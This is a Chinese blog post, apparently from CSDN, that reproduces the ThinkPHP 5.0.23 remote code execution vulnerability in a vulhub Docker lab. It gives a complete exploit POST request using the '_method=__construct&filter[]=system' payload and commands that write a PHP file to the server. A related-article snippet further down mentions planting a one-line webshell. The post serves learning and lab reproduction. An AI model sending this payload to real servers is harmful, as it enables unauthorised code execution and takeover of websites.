【vulhub漏洞复现】Thinkphp 5.0.23 任意代码执行

最新推荐文章于 2023-09-07 22:52:37 发布
最新推荐文章于 2023-09-07 22:52:37 发布
阅读量2.1k 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全 php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51683653/article/details/129882463
版权

一、漏洞详情

影响版本 ThinkPHP <= 5.0.24

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

二、复现过程

搭建docker环境​​​​​​

docker-compose up -d

进入8080端口 

 构造POST包并发送

访问http://127.0.0.1:8080/index.php?s=captcha

 bp抓包构造post请求发送(hackbar直接post也可以)

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

 ls

 echo "<?php phpinfo();?>" >test.php

 

 

RexHarrr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2067
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞的利用及其修复方法,该漏洞的修复对于广大使用ThinkPHP开发人员来说尤为重要!需要的朋友可以参考下
ThinkPHP5 5.0.23ThinkPHP5 5.0.22/5.1.29漏洞复现
weixin_48739941的博客
07-10 1567
ThinkPHP5漏洞复现
[漏洞复现]ThinkPHP5 核心类 Request 远程代码执行
wwxxee
05-20 471
ThinkPHP 5.x 核心类 Request 远程代码执行漏洞复现 影响版本: ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 ThinkPHP 5.2.0beta1 环境: vulhub-master/thinkphp/5.0.23-rce 启动docker环境之后,访问: http://ip:8080/ POC: POST /index.php?s=captcha HTTP/1.1 Host: 192.168.17.134:8080 User-Age
复现ThinkPHP5 5.0.23远程代码执行漏洞
weixin_67813445的博客
03-14 405
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
Thinkphp5.0.0~5.0.23 RCE漏洞复现分析
cosmoslin的博客
11-19 6129
漏洞概要 漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。 环境搭建: Phpstudy: OS: Windows PHP: 7.3.4 ThinkPHP: 5.0.22 POC http://xxxxxx.xxx/public/?s=captcha Body _method=__construct&filter[]=system&method=get&get.
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
vulhub-漏洞复现(Spring Data Rest 远程命令执行漏洞(CVE-2017-8046))
weixin_45095113的博客
12-08 470
vulhub漏洞复现
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2470
vulhub-spring漏洞复现
vulhub中间件解析漏洞复现
m0_46684679的博客
12-07 1081
vulhub中间件解析漏洞复现
每天复现一个漏洞--vulhub
qq836869520的博客
11-30 930
phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433) 漏洞原理:http://www.polaris-lab.com/index.php/archives/66/ 根据提示我们先进入到 /scripts/setup.php 的目录下 由于 configuration 参数是可控的 所以我们可以根据 poc...
vulhubthinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现
qq_58873970的博客
09-07 370
----------------梦想,想像力和希望实现这些梦想的人的勇气充满希望。
Thinkphp 5.0.23 rce复现(新手)
nqzh001的博客
12-18 1278
今天学习使用docker复现Thinkphp 5.0.23 rce漏洞 使用docker配合Vulhub一键搭建漏洞测试靶场; Vulhub搭建地址 https://vulhub.org/#/docs/run/ 这边推荐使用Ubuntu,之前使用CentOS搭建总是出现各种错误。 搭建成功后,开始访问 直接上poc _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id 这个id就是想要
使用Docker Dockerfile构建php LNMP集成开发环境,并运行Thinkphp5
ityun的博客
05-20 2345
这篇主要介绍如何在Mac、Windows10使用docker搭建LNMP集成开发环境。下面我会写Dockerfile编译安装Nginx+php基础环境。mysql、redis基于官方Docker hub,分别构建我们自己的镜像。
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2383
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
thinkphp5.0.23rce漏洞复现
最新发布
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RexHarrr

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值